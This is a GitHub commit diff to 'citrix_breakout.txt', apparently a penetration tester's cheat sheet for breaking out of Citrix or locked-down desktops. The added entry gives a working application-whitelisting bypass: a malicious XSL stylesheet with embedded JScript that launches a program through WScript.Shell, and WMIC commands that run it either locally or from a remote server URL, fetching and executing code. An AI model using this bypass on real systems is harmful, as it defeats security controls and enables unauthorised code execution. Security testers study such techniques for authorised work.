Skip to content

Commit

Permalink
Update citrix_breakout.txt
Browse files Browse the repository at this point in the history
  • Loading branch information
darksh3llRU authored May 6, 2020
1 parent 381be78 commit 237e914
Showing 1 changed file with 18 additions and 2 deletions.
20 changes: 18 additions & 2 deletions citrix_breakout.txt
Original file line number Diff line number Diff line change
Expand Up @@ -61,6 +61,22 @@ goto :start
Click open file location
-------------------------------------
-------------------------------------
10)
-------------------------------------
10) Use WMIC,XSL to bypass app whitelisting
-------------------------------------
evil.xsl
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc");
]]> </ms:script>
</stylesheet>


wmic os get /FORMAT:"evil.xsl"
wmic os get /FORMAT:"https://server/evil.xsl"
-------------------------------------

0 comments on commit 237e914

Please sign in to comment.